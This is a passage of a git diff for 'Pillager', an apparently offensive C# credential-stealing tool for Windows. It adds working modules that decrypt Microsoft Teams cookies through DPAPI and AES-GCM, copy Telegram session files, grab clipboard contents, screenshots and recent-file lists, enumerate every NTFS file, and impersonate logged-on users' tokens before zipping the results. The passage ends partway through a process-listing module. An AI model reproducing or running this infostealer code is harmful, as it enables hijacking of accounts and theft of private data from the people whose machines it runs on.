if (string.IsNullOrEmpty(Desktop) && string.IsNullOrEmpty(Store)) return;
string savepath = Path.Combine(path, MessengerName);
string savepath = Path.Combine(path, "Skype");
Directory.CreateDirectory(savepath);
if (!String.IsNullOrEmpty(Desktop)) File.WriteAllText(Path.Combine(savepath, MessengerName + "_Desktop.txt"), Desktop);
if (!String.IsNullOrEmpty(Store)) File.WriteAllText(Path.Combine(savepath, MessengerName + "_Store.txt"), Store);
if (!String.IsNullOrEmpty(Desktop)) File.WriteAllText(Path.Combine(savepath, "Skype_Desktop.txt"), Desktop, Encoding.UTF8);
if (!String.IsNullOrEmpty(Store)) File.WriteAllText(Path.Combine(savepath, "Skype_Store.txt"), Store, Encoding.UTF8);
}
catch { }
}

140
Pillager/Messengers/Teams.cs Normal file
View File

@ -0,0 +1,140 @@
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
namespace Pillager.Messengers
{
internal class Teams : ICommand
{
public string cookies()
{
StringBuilder cookies = new StringBuilder();
string cookie_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Packages\\MicrosoftTeams_8wekyb3d8bbwe\\LocalCache\\Microsoft\\MSTeams\\EBWebView\\Default\\Network\\Cookies");
if (!File.Exists(cookie_path))
return "";
try
{
string cookie_tempFile = Path.GetTempFileName();
try
{
File.Copy(cookie_path, cookie_tempFile, true);
}
catch
{
byte[] ckfile = LockedFile.ReadLockedFile(cookie_path);
if (ckfile != null)
{
File.WriteAllBytes(cookie_tempFile, ckfile);
}
}
SQLiteHandler handler = new SQLiteHandler(cookie_tempFile);
if (!handler.ReadTable("cookies"))
return "";
for (int i = 0; i < handler.GetRowCount(); i++)
{
try
{
string host_key = handler.GetValue(i, "host_key");
string name = handler.GetValue(i, "name");
string crypt = handler.GetValue(i, "encrypted_value");
string path = handler.GetValue(i, "path");
double expDateDouble = 0;
long.TryParse(handler.GetValue(i, "expires_utc"), out var expDate);
if ((expDate / 1000000.000000000000) - 11644473600 > 0)
expDateDouble = (expDate / 1000000.000000000000000) - 11644473600;
string cookie = Encoding.UTF8.GetString(DecryptData(Convert.FromBase64String(crypt)));
cookies.AppendLine("{");
cookies.AppendLine(" \"domain\": \"" + host_key + "\",");
cookies.AppendLine(" \"expirationDate\": " + expDateDouble + ",");
cookies.AppendLine(" \"hostOnly\": false,");
cookies.AppendLine(" \"name\": \"" + name + "\",");
cookies.AppendLine(" \"path\": \"" + path + "\",");
cookies.AppendLine(" \"session\": true,");
cookies.AppendLine(" \"storeId\": null,");
cookies.AppendLine(" \"value\": \"" + cookie.Replace("\"", "\\\"") + "\"");
cookies.AppendLine("},");
}
catch { }
}
File.Delete(cookie_tempFile);
}
catch { }
if (cookies.Length > 0)
{
string temp = cookies.ToString();
return "[" + temp.Substring(0, temp.Length - 3) + "]";
}
return cookies.ToString();
}
public byte[] GetMasterKey()
{
string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Packages\\MicrosoftTeams_8wekyb3d8bbwe\\LocalCache\\Microsoft\\MSTeams\\EBWebView\\Local State");
byte[] masterKey = new byte[] { };
if (!File.Exists(filePath))
return null;
var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath).Replace(" ", ""));
foreach (System.Text.RegularExpressions.Match prof in pattern)
{
if (prof.Success)
masterKey = Convert.FromBase64String((prof.Groups[1].Value));
}
byte[] temp = new byte[masterKey.Length - 5];
Array.Copy(masterKey, 5, temp, 0, masterKey.Length - 5);
try
{
return ProtectedData.Unprotect(temp, null, DataProtectionScope.CurrentUser);
}
catch
{
return null;
}
}
private byte[] DecryptData(byte[] buffer)
{
byte[] decryptedData = null;
byte[] MasterKey = GetMasterKey();
if (MasterKey is null) return null;
try
{
string bufferString = Encoding.UTF8.GetString(buffer);
if (bufferString.StartsWith("v10") || bufferString.StartsWith("v11"))
{
byte[] iv = new byte[12];
Array.Copy(buffer, 3, iv, 0, 12);
byte[] cipherText = new byte[buffer.Length - 15];
Array.Copy(buffer, 15, cipherText, 0, buffer.Length - 15);
byte[] tag = new byte[16];
Array.Copy(cipherText, cipherText.Length - 16, tag, 0, 16);
byte[] data = new byte[cipherText.Length - tag.Length];
Array.Copy(cipherText, 0, data, 0, cipherText.Length - tag.Length);
decryptedData = new AesGcm().Decrypt(MasterKey, iv, null, data, tag);
}
else
{
decryptedData = ProtectedData.Unprotect(buffer, null, DataProtectionScope.CurrentUser);
}
}
catch { }
return decryptedData;
}
public override void Save(string path)
{
try
{
string result = cookies();
if (string.IsNullOrEmpty(result)) return;
string savepath = Path.Combine(path, "Teams");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "Teams.txt"), result, Encoding.UTF8);
}
catch { }
}
}
}

15
Pillager/Messengers/Telegram.cs
View File

@ -1,17 +1,16 @@
using System;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
namespace Pillager.Messengers
{
internal class Telegram
internal class Telegram : ICommand
{
public static string MessengerName = "Telegram";
public string MessengerPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Telegram Desktop");
public static string MessengerPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Telegram Desktop");
private static string[] sessionpaths =
private string[] sessionpaths =
{
"tdata\\key_datas",
"tdata\\D877F783D5D3EF8Cs",
@ -31,7 +30,7 @@ namespace Pillager.Messengers
"tdata\\0CA814316818D8F6\\maps",
};
public static void Save(string path)
public override void Save(string path)
{
try
{
@ -49,7 +48,7 @@ namespace Pillager.Messengers
tgpaths.Add(MessengerPath);
for (int i = 0; i < tgpaths.Count; i++)
{
string savepath = Path.Combine(path, MessengerName);
string savepath = Path.Combine(path, "Telegram");
Directory.CreateDirectory(savepath);
Directory.CreateDirectory(Path.Combine(savepath, "tdata_" + i));

16
Pillager/Pillager.csproj
View File

@ -22,6 +22,7 @@
<DefineConstants>TRACE;DEBUG</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
@ -31,8 +32,10 @@
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
@ -55,8 +58,12 @@
<Compile Include="Browsers\Chrome.cs" />
<Compile Include="Helper\Bcrypt.cs" />
<Compile Include="Helper\Blowfish.cs" />
<Compile Include="Helper\ICommandOnce.cs" />
<Compile Include="Helper\decryptMoz3DES.cs" />
<Compile Include="Helper\ICommand.cs" />
<Compile Include="Helper\JavaRng.cs" />
<Compile Include="Helper\Navicat11Cipher.cs" />
<Compile Include="Helper\NtfsReader.cs" />
<Compile Include="Helper\Pixini.cs" />
<Compile Include="Helper\LockedFile.cs" />
<Compile Include="Helper\Methods.cs" />
@ -65,8 +72,10 @@
<Compile Include="Helper\Native.cs" />
<Compile Include="Helper\Pbkdf2.cs" />
<Compile Include="Helper\RC4Crypt.cs" />
<Compile Include="Helper\Shortcut.cs" />
<Compile Include="Helper\TripleDESHelper.cs" />
<Compile Include="Helper\ZipStorer.cs" />
<Compile Include="IMEs\Win10Ms_Pinyin.cs" />
<Compile Include="Mails\Foxmail.cs" />
<Compile Include="Mails\MailBird.cs" />
<Compile Include="Mails\MailMaster.cs" />
@ -77,9 +86,15 @@
<Compile Include="Messengers\Line.cs" />
<Compile Include="Messengers\QQ.cs" />
<Compile Include="Messengers\Skype.cs" />
<Compile Include="Messengers\Teams.cs" />
<Compile Include="Messengers\Telegram.cs" />
<Compile Include="SystemInfos\ClipBoard.cs" />
<Compile Include="SystemInfos\FileList.cs" />
<Compile Include="SystemInfos\InstalledApp.cs" />
<Compile Include="SystemInfos\RecentFile.cs" />
<Compile Include="SystemInfos\ScreenShot.cs" />
<Compile Include="SystemInfos\SystemInfo.cs" />
<Compile Include="SystemInfos\TaskList.cs" />
<Compile Include="SystemInfos\Wifi.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
@ -87,6 +102,7 @@
<Compile Include="Softwares\NeteaseCloudMusic.cs" />
<Compile Include="Tools\DBeaver.cs" />
<Compile Include="Tools\FinalShell.cs" />
<Compile Include="Tools\HeidiSQL.cs" />
<Compile Include="Tools\MobaXterm.cs" />
<Compile Include="Tools\Navicat.cs" />
<Compile Include="Tools\RDCMan.cs" />

93
Pillager/Program.cs
View File

@ -1,6 +1,7 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using Pillager.Browsers;
using Pillager.FTPs;
using Pillager.Helper;
@ -14,10 +15,12 @@ namespace Pillager
{
internal class Program
{
static string savepath = Path.Combine(Path.GetTempPath(), "Pillager");
static string logpath = Path.Combine(savepath, "Pillager.log");
static string savezippath = savepath + ".zip";
[STAThread]
static void Main(string[] args)
{
string savepath = Path.Combine(Path.GetTempPath(), "Pillager");
string savezippath = savepath + ".zip";
if (Directory.Exists(savepath)) Directory.Delete(savepath, true);
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
@ -28,7 +31,7 @@ namespace Pillager
{
if (p.ProcessName.ToLower() == "explorer" && Methods.ImpersonateProcessToken(p.Id))
{
string usersavepath = Path.Combine(savepath, Methods.GetProcessUserName(p.Id));
string usersavepath = Path.Combine(savepath, Methods.GetProcessUserName(p));
Directory.CreateDirectory(usersavepath);
SaveAll(usersavepath);
Native.RevertToSelf();
@ -40,65 +43,49 @@ namespace Pillager
SaveAll(savepath);
}
//Zip
ZipStorer zip = ZipStorer.Create(savezippath);
foreach (var item in Directory.GetDirectories(savepath))
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
foreach (var item in Directory.GetFiles(savepath))
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
zip.Close();
SaveAllOnce(savepath);
//Zip
using (ZipStorer zip = ZipStorer.Create(savezippath))
{
foreach (var item in Directory.GetDirectories(savepath))
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
foreach (var item in Directory.GetFiles(savepath))
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
}
Directory.Delete(savepath, true);
}
static void SaveAll(string savepath)
{
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
Chrome.Save(savepath);
FireFox.Save(savepath);
var self = Assembly.GetExecutingAssembly();
//FTP
WinSCP.Save(savepath);
FileZilla.Save(savepath);
CoreFTP.Save(savepath);
Snowflake.Save(savepath);
foreach (var type in self.GetTypes())
{
if (type.IsSubclassOf(typeof(ICommand)))
{
File.AppendAllText(logpath, "Try to save "+type.Name +" to "+ savepath+". ");
var instance = (ICommand)Activator.CreateInstance(type);
instance.Save(savepath);
File.AppendAllText(logpath, "Finished!" + Environment.NewLine);
}
}
}
//Tools
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
Navicat.Save(savepath);
RDCMan.Save(savepath);
FinalShell.Save(savepath);
SQLyog.Save(savepath);
DBeaver.Save(savepath);
TortoiseSVN.Save(savepath);
SecureCRT.Save(savepath);
static void SaveAllOnce(string savepath)
{
var self = Assembly.GetExecutingAssembly();
//Softwares
VSCode.Save(savepath);
NeteaseCloudMusic.Save(savepath);
//Mail
MailMaster.Save(savepath);
Foxmail.Save(savepath);
Outlook.Save(savepath);
MailBird.Save(savepath);
//Messengers
QQ.Save(savepath);
Telegram.Save(savepath);
Skype.Save(savepath);
Enigma.Save(savepath);
DingTalk.Save(savepath);
Line.Save(savepath);
Discord.Save(savepath);
//SystemInfos
Wifi.Save(savepath);
ScreenShot.Save(savepath);
InstalledApp.Save(savepath);
foreach (var type in self.GetTypes())
{
if (type.IsSubclassOf(typeof(ICommandOnce)))
{
File.AppendAllText(logpath, "Try to save " + type.Name + " to " + savepath + ". ");
var instance = (ICommandOnce)Activator.CreateInstance(type);
instance.Save(savepath);
File.AppendAllText(logpath, "Finished!" + Environment.NewLine);
}
}
}
}
}

14
Pillager/Softwares/NeteaseCloudMusic.cs
View File

@ -1,22 +1,22 @@
using System;
using Pillager.Helper;
using System;
using System.IO;
using System.Text;
namespace Pillager.Softwares
{
internal class NeteaseCloudMusic
internal class NeteaseCloudMusic : ICommand
{
public static string SoftwareName = "NeteaseCloudMusic";
public static void Save(string path)
public override void Save(string path)
{
try
{
string infopath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\CloudMusic\\info");
string info = File.ReadAllText(infopath);
if (string.IsNullOrEmpty(info)) return;
string savepath = Path.Combine(path, SoftwareName);
string savepath = Path.Combine(path, "NeteaseCloudMusic");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "userinfo.url"), " [InternetShortcut]\r\nURL=https://music.163.com/#/user/home?id=" + info);
File.WriteAllText(Path.Combine(savepath, "userinfo.url"), " [InternetShortcut]\r\nURL=https://music.163.com/#/user/home?id=" + info, Encoding.UTF8);
}
catch { }
}

8
Pillager/Softwares/VSCode.cs
View File

@ -4,17 +4,15 @@ using Pillager.Helper;
namespace Pillager.Softwares
{
internal class VSCode
internal class VSCode : ICommand
{
public static string SoftwareName = "VSCode";
public static void Save(string path)
public override void Save(string path)
{
try
{
string historypath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Code\\User\\History");
if (!Directory.Exists(historypath)) return;
string savepath = Path.Combine(path, SoftwareName);
string savepath = Path.Combine(path, "VSCode");
Directory.CreateDirectory(savepath);
Methods.CopyDirectory(historypath, Path.Combine(savepath, "History"), true);
}

37
Pillager/SystemInfos/ClipBoard.cs Normal file
View File

@ -0,0 +1,37 @@
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.Drawing.Imaging;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace Pillager.SystemInfos
{
internal class ClipBoard : ICommandOnce
{
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, "System");
IDataObject iData = Clipboard.GetDataObject();
if (iData.GetDataPresent(DataFormats.Text))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "ClipBoard.txt"), (string)iData.GetData(DataFormats.Text), Encoding.UTF8);
}
else if (iData.GetDataPresent(DataFormats.Bitmap))
{
Directory.CreateDirectory(savepath);
Bitmap bmp = (Bitmap)iData.GetData(DataFormats.Bitmap);
bmp.Save(Path.Combine(savepath, "ClipBoard.jpg"), ImageFormat.Jpeg);
bmp.Dispose();
}
}
catch { }
}
}
}

47
Pillager/SystemInfos/FileList.cs Normal file
View File

@ -0,0 +1,47 @@
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
namespace Pillager.SystemInfos
{
internal class FileList : ICommandOnce
{
public override void Save(string path)
{
try
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
var allDrives = DriveInfo.GetDrives();
StringBuilder sb = new StringBuilder();
foreach (var driveToAnalyze in allDrives)
{
try
{
NtfsReader ntfsReader = new NtfsReader(driveToAnalyze, NtfsReader.RetrieveMode.All);
IEnumerable<NtfsReader.INode> nodes =
ntfsReader.GetNodes(driveToAnalyze.Name);
foreach (NtfsReader.INode node in nodes)
sb.AppendLine(((node.Attributes & NtfsReader.Attributes.Directory) != 0 ? "Dir;" : "File;") + node.FullName);
}
catch { }
}
string savepath = Path.Combine(path, "System");
string result = sb.ToString();
if (!string.IsNullOrEmpty(result))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "FileList.txt"), result, Encoding.UTF8);
}
}
catch { }
}
}
}

16
Pillager/SystemInfos/InstalledApp.cs
View File

@ -1,17 +1,13 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using Pillager.Helper;
using System.IO;
using System.Linq;
using System.Text;
namespace Pillager.SystemInfos
{
internal class InstalledApp
internal class InstalledApp : ICommandOnce
{
public static string SystemInfoName = "InstalledApp";
public static string GetInfo()
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
try
@ -28,16 +24,16 @@ namespace Pillager.SystemInfos
{ }
return sb.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, SystemInfoName);
string savepath = Path.Combine(path, "System");
string result = GetInfo();
if (!string.IsNullOrEmpty(result))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), result);
File.WriteAllText(Path.Combine(savepath, "InstalledApp.txt"), result, Encoding.UTF8);
}
}
catch { }

43
Pillager/SystemInfos/RecentFile.cs Normal file
View File

@ -0,0 +1,43 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using Pillager.Helper;
namespace Pillager.SystemInfos
{
internal class RecentFile : ICommand
{
public string GetInfo()
{
StringBuilder sb = new StringBuilder(); string recent = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft\\Windows\\Recent");
foreach (var file in Directory.GetFiles(recent, "*.lnk"))
{
try
{
Shortcut.IWshShortcut shortcut = (Shortcut.IWshShortcut)Shortcut.m_type.InvokeMember("CreateShortcut", System.Reflection.BindingFlags.InvokeMethod, null, Shortcut.m_shell, new object[] { file });
if (!string.IsNullOrEmpty(shortcut.TargetPath)) sb.AppendLine(shortcut.TargetPath);
}
catch { }
}
return sb.ToString();
}
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, "System");
string result = GetInfo();
if (!string.IsNullOrEmpty(result))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "RecentFile.txt"), result, Encoding.UTF8);
}
}
catch { }
}
}
}

12
Pillager/SystemInfos/ScreenShot.cs
View File

@ -6,18 +6,16 @@ using Pillager.Helper;
namespace Pillager.SystemInfos
{
internal class ScreenShot
internal class ScreenShot : ICommand
{
public static string SystemInfoName = "ScreenShot";
public static void Save(string path)
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, SystemInfoName);
string savepath = Path.Combine(path, "System");
try
{
Native.SetProcessDPIAware();
Native.SetupDpiAwareness();
}
catch { }
if (Screen.AllScreens.Length > 0)
@ -32,7 +30,7 @@ namespace Pillager.SystemInfos
{
graphics.CopyFromScreen(screen.Bounds.Left, screen.Bounds.Top, 0, 0, new Size(bitmap.Width, bitmap.Height), CopyPixelOperation.SourceCopy);
}
bitmap.Save(Path.Combine(savepath, SystemInfoName + i + ".jpg"), ImageFormat.Jpeg);
bitmap.Save(Path.Combine(savepath, "ScreenShot" + i + ".jpg"), ImageFormat.Jpeg);
}
}
}

284
Pillager/SystemInfos/SystemInfo.cs Normal file
View File

@ -0,0 +1,284 @@
using Microsoft.VisualBasic.Devices;
using Pillager.Helper;
using System;
using System.IO;
using System.Linq;
using System.Management;
using System.Net.NetworkInformation;
using System.Net.Sockets;
using System.Text;
using System.Windows.Forms;
namespace Pillager.SystemInfos
{
internal class SystemInfo : ICommandOnce
{
public string GetMessage()
{
StringBuilder sb = new StringBuilder();
ComputerInfo computerInfo = new ComputerInfo();
sb.AppendFormat("{0,-30}", "Host Name:");
sb.AppendLine(Environment.MachineName);
sb.AppendFormat("{0,-30}", "OS Name:");
sb.AppendLine(computerInfo.OSFullName);
using (ManagementObject wmi = new ManagementObjectSearcher("select * from Win32_OperatingSystem").Get().Cast<ManagementObject>().First())
{
sb.AppendFormat("{0,-30}", "OS Version:");
sb.AppendLine(wmi["Version"] + " Build " + wmi["BuildNumber"]);
sb.AppendFormat("{0,-30}", "OS Architecture:");
sb.AppendLine(wmi["OSArchitecture"].ToString());
sb.AppendFormat("{0,-30}", "OS Language:");
foreach (var item in (string[])wmi["MUILanguages"])
{
sb.Append(item.ToString() + "|");
}
sb.Remove(sb.Length - 1, 1);
sb.AppendLine();
sb.AppendFormat("{0,-30}", "OS Architecture:");
sb.AppendLine(wmi["OSArchitecture"].ToString());
sb.AppendFormat("{0,-30}", "Install Date:");
sb.AppendLine(wmi["InstallDate"].ToString());
sb.AppendFormat("{0,-30}", "OS RegisteredUser:");
sb.AppendLine(wmi["RegisteredUser"].ToString());
sb.AppendFormat("{0,-30}", "Registered User:");
sb.AppendLine(wmi["RegisteredUser"].ToString());
sb.AppendFormat("{0,-30}", "Product Key:");
sb.AppendLine(wmi["SerialNumber"].ToString());
sb.AppendFormat("{0,-30}", "Windows Directory:");
sb.AppendLine(wmi["WindowsDirectory"].ToString());
sb.AppendFormat("{0,-30}", "System Directory:");
sb.AppendLine(wmi["SystemDirectory"].ToString());
sb.AppendFormat("{0,-30}", "Last Boot Up Time:");
sb.AppendLine(wmi["LastBootUpTime"].ToString());
}
sb.AppendLine();
try
{
using (ManagementObject Mobject = new ManagementClass("Win32_BIOS").GetInstances().OfType<ManagementObject>().FirstOrDefault())
{
sb.AppendFormat("{0,-30}", "BIOS Version:");
sb.AppendLine((string)Mobject["Manufacturer"] + " " + (string)Mobject["SMBIOSBIOSVersion"] + " " + ManagementDateTimeConverter.ToDateTime((string)Mobject["ReleaseDate"]).ToString("yyyy/MM/dd"));
}
sb.AppendFormat("{0,-30}", "Bios Mode:");
sb.AppendLine((Native.GetFirmwareType("", "{00000000-0000-0000-0000-000000000000}", IntPtr.Zero, 0) == 1) ? "BIOS" : "UEFI");
}
catch { }
try
{
using (ManagementObjectCollection hardDiskC = new ManagementClass("Win32_ComputerSystemProduct").GetInstances())
{
sb.AppendFormat("{0,-30}", "Computer Model:");
sb.AppendLine(hardDiskC.OfType<ManagementObject>().FirstOrDefault()["Name"].ToString());
}
sb.AppendFormat("{0,-30}", "Boot Mode:");
sb.AppendLine(SystemInformation.BootMode.ToString());
}
catch { }
sb.AppendLine();
try
{
using (ManagementObjectSearcher mos = new ManagementObjectSearcher("Select * from Win32_Processor"))
{
foreach (ManagementObject mo in mos.Get())
{
sb.AppendFormat("{0,-30}", "CPU Name:");
sb.AppendLine(mo["Name"].ToString());
sb.AppendFormat("{0,-30}", "");
sb.AppendLine("(" + mo["NumberOfCores"].ToString() + " Cores " + mo["NumberOfLogicalProcessors"].ToString() + " Processors VT " + ((bool)mo["VirtualizationFirmwareEnabled"] ? "Enable)" : "Disable)"));
}
}
}
catch { }
try
{
using (ManagementObjectSearcher Search = new ManagementObjectSearcher("Select * From Win32_ComputerSystem"))
{
ManagementObject Mobject = Search.Get().OfType<ManagementObject>().FirstOrDefault();
sb.AppendFormat("{0,-30}", "RAM Size:");
sb.AppendLine((((Convert.ToDouble(Mobject["TotalPhysicalMemory"]) / 1073741824) > 1) ? Math.Ceiling(Convert.ToDouble(Mobject["TotalPhysicalMemory"]) / 1073741824).ToString() : (Convert.ToDouble(Mobject["TotalPhysicalMemory"]) / 1073741824).ToString()) + " GB");
}
}
catch { }
sb.AppendLine();
try
{
DriveInfo[] allDrives = DriveInfo.GetDrives();
sb.AppendFormat("{0,-30}", "DriveInfo:");
sb.AppendLine();
foreach (DriveInfo d in allDrives)
{
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(d.Name);
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Drive type..................: {0}", d.DriveType));
if (d.IsReady == true)
{
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Volume label................: {0}", d.VolumeLabel));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" File system.................: {0}", d.DriveFormat));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Available space.............: {0} GB", d.TotalFreeSpace / 1024 / 1024 / 1024));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Total size..................: {0} GB ", d.TotalSize / 1024 / 1024 / 1024));
sb.AppendLine();
}
}
sb.AppendLine();
}
catch { }
try
{
ManagementObjectSearcher objvide = new ManagementObjectSearcher("select * from Win32_VideoController");
sb.AppendFormat("{0,-30}", "VideoController:");
sb.AppendLine();
foreach (ManagementObject obj in objvide.Get())
{
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format("Name: " + obj["Name"]));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format("DriverVersion: " + obj["DriverVersion"]));
sb.AppendLine();
}
sb.AppendLine();
}
catch { }
try
{
sb.AppendFormat("{0,-30}", "Interface:");
NetworkInterface[] nics = NetworkInterface.GetAllNetworkInterfaces();
if (nics == null || nics.Length < 1)
{
sb.AppendLine(" No network interfaces found.");
}
else
{
sb.AppendLine(string.Format("Number of interfaces .................... : {0}", nics.Length));
}
foreach (NetworkInterface adapter in nics)
{
IPInterfaceProperties properties = adapter.GetIPProperties();
sb.AppendLine();
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(adapter.Description);
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(String.Empty.PadLeft(adapter.Description.Length, '='));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Interface type ........................ : {0}", adapter.NetworkInterfaceType));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Physical Address ...................... : {0}",
adapter.GetPhysicalAddress().ToString()));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Operational status .................... : {0}",
adapter.OperationalStatus));
string versions = "";
if (adapter.Supports(NetworkInterfaceComponent.IPv4))
{
versions = "IPv4 ";
}
if (adapter.Supports(NetworkInterfaceComponent.IPv6))
{
versions += "IPv6";
}
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" IP version ............................ : {0}", versions));
if (adapter.NetworkInterfaceType == NetworkInterfaceType.Loopback)
{
continue;
}
UnicastIPAddressInformationCollection UnicastIPAddressInformationCollection = properties.UnicastAddresses;
foreach (UnicastIPAddressInformation UnicastIPAddressInformation in UnicastIPAddressInformationCollection)
{
if (UnicastIPAddressInformation.Address.AddressFamily.ToString() == ProtocolFamily.InterNetwork.ToString())
{
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(" IPV4 Address .......................... : " + UnicastIPAddressInformation.Address.ToString());
}
}
foreach (UnicastIPAddressInformation UnicastIPAddressInformation in UnicastIPAddressInformationCollection)
{
if (UnicastIPAddressInformation.Address.AddressFamily.ToString() == ProtocolFamily.InterNetworkV6.ToString())
{
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(" IPV6 Address .......................... : " + UnicastIPAddressInformation.Address.ToString());
}
}
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" DNS suffix ............................ : {0}",
properties.DnsSuffix));
string label;
if (adapter.Supports(NetworkInterfaceComponent.IPv4))
{
IPv4InterfaceProperties ipv4 = properties.GetIPv4Properties();
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" MTU.................................... : {0}", ipv4.Mtu));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" DHCP Enabled........................... : {0}", ipv4.IsDhcpEnabled));
if (ipv4.UsesWins)
{
IPAddressCollection winsServers = properties.WinsServersAddresses;
if (winsServers.Count > 0)
{
label = " WINS Servers .......................... :";
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(label, winsServers));
}
}
}
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" DNS enabled ........................... : {0}",
properties.IsDnsEnabled));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Dynamically configured DNS ............ : {0}",
properties.IsDynamicDnsEnabled));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Receive Only .......................... : {0}",
adapter.IsReceiveOnly));
sb.AppendFormat("{0,-30}", "");
sb.AppendLine(string.Format(" Multicast ............................. : {0}",
adapter.SupportsMulticast));
sb.AppendLine();
}
}
catch { }
return sb.ToString();
}
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, "System");
string result = GetMessage();
if (!string.IsNullOrEmpty(result))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "SystemInfo.txt"), result, Encoding.UTF8);
}
}
catch { }
}
}
}

71
Pillager/SystemInfos/TaskList.cs Normal file
View File

@ -0,0 +1,71 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using Pillager.Helper;
using System.Diagnostics;
namespace Pillager.SystemInfos
{
internal class TaskList : ICommandOnce
{
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
List<string[]> lines = new List<string[]>();
foreach (Process process in Process.GetProcesses())
{
string architecture;
try
{
Native.IsWow64Process(process.Handle, out var isWow64Process);
architecture = isWow64Process ? "x64" : "x86";
}
catch
{
architecture = "N/A";
}
var workingSet = (int)(process.WorkingSet64 / 1000000);
string userName = Methods.GetProcessUserName(process);
lines.Add(
new string[] {process.ProcessName,
process.Id.ToString(),
architecture,
userName,
Convert.ToString(workingSet)
}
);
}
string[][] linesArray = lines.ToArray();
Comparer<int> comparer = Comparer<int>.Default;
Array.Sort<String[]>(linesArray, (x, y) => comparer.Compare(Convert.ToInt32(x[1]), Convert.ToInt32(y[1])));
string[] headerArray = { "ProcessName", "PID", "Arch", "UserName", "MemUsage" };
sb.AppendLine(string.Format("{0,-30} {1,-8} {2,-6} {3,-28} {4,8}", headerArray));
foreach (string[] line in linesArray)
{
